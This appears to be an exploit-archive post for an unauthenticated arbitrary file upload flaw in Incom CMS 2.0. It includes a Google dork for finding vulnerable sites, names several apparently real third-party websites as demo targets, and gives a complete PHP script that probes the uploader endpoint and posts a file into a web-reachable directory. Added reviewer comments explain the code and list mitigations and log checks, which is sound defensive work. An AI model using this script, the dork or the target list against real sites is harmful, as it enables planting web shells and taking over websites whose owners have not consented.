Incom 2.0 arbitrary file upload

2018.01.19
ye MrSqar (YE) ye
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

-========================================================-
# Exploit title : Incom CMS 2.0 arbitrary file upload
# dork : intext:"Incom CMS 2.0"
# author : MrSqar Yemeni hacker
# Team : IT-Geeks
# Tested on : BackBox linux
# check if site is vulnerabe : /incom/modules/uploader/showcase/script.php
picture : https://b.top4top.net/p_743j5x8y1.png
# your file will uploaded here : /upload/userfiles/image/YourFile.php
demo : http://pnualaugaz.kz/upload/userfiles/image/root.png
# deom sites : http://pnualaugaz.kz/ http://mzgesheft.kz/ http://mekom.kz/
-====================-
# exploit script #
<?php
/*
 * Coded by MrSqar
 *
 * contact : mrsqar@gmail.com
 *
 * Gz : KaHawk & all my team members
 *
 */

/*
 * Reviewer notes (defensive reading of the listing below).
 *
 * What the script does: it reads a base URL from STDIN, requests
 * <base>/incom/modules/uploader/showcase/script.php and, if the response body
 * contains the string "status", sends a multipart POST carrying a local file
 * in the field "Filedata" to that same URL. No cookie, token or other
 * credential is set on either request, so per the advisory the endpoint
 * accepts the upload unauthenticated and stores it under the web-reachable
 * /upload/userfiles/image/ directory.
 *
 * NOTE(review): the advisory header lists CWE as N/A; the behaviour described
 * corresponds to CWE-434 (Unrestricted Upload of File with Dangerous Type).
 *
 * Mitigation for site owners: remove or access-restrict the uploader
 * "showcase" script, require an authenticated session for uploads, enforce a
 * server-side allow-list on file extension and content type, and disable
 * script execution in the upload directory (or store uploads outside the
 * web root).
 *
 * Detection: review web access logs for POST requests to
 * /incom/modules/uploader/showcase/script.php and audit
 * /upload/userfiles/image/ for files that are not images.
 *
 * NOTE(review): soft-hyphen (U+00AD) characters that the hosting page inserted
 * for line wrapping have been removed and the collapsed single line has been
 * split into statements; no statement was added, removed or reordered.
 */

echo " [!] Enter target url : ";
// Read one line (at most 1023 bytes) from STDIN and strip surrounding whitespace.
$target = fgets(STDIN,1024);
$target = trim($target);

/**
 * Probe the uploader endpoint under $target and, if it answers, POST a local file to it.
 *
 * @param string $target Base URL read from STDIN; it is concatenated into the
 *                       request URL without any validation.
 * @return void There is no return statement; output is written with echo.
 */
function f($target){
    // ANSI colour escape sequences; none of the three is used in this listing.
    $green = "\e[92m";
    $orange = "\e[38;5;208m";
    $red = "\e[91m";

    $target1 = $target."/incom/modules/uploader/showcase/script.php";
    // '@' hides the warning if the request fails; $src is then false, the
    // preg_match() below does not match and the function ends without output.
    $src = @file_get_contents("$target1");

    // your file name here :
    // $uploadfile2 keeps the bare name for the final message, because
    // $uploadfile is replaced by its absolute path further down.
    $uploadfile2="root.png";
    $uploadfile="root.png";
    // -=================- //

    // The endpoint is treated as present when its response contains "status".
    // NOTE(review): the response format itself is not shown on the page.
    if(preg_match("/status/",$src)){
        $uploadfile=realpath($uploadfile) ;
        if (function_exists('curl_file_create')) { // php 5.5+
            $cFile = curl_file_create($uploadfile);
        } else { //
            // Older PHP: the '@' prefix is the legacy way to mark a file field for cURL.
            $cFile = '@' . realpath($uploadfile);
        }
        // Passing an array to CURLOPT_POSTFIELDS makes cURL send multipart/form-data.
        $post = array('Filedata'=> $cFile);
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL,"$target1");
        curl_setopt($ch, CURLOPT_POST,1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        // The response is stored in $result but never inspected.
        $result=curl_exec ($ch);
        curl_close ($ch);
        // Printed unconditionally: this reports the expected location only and
        // does not confirm that the server accepted or stored the file.
        echo " Uplaoded done : ".$target."/upload/userfiles/image/$uploadfile2"."\n";
    }
}

// f() has no return statement, so this echo prints an empty string.
echo f($target);
?>

References:

MrSqar Hacker

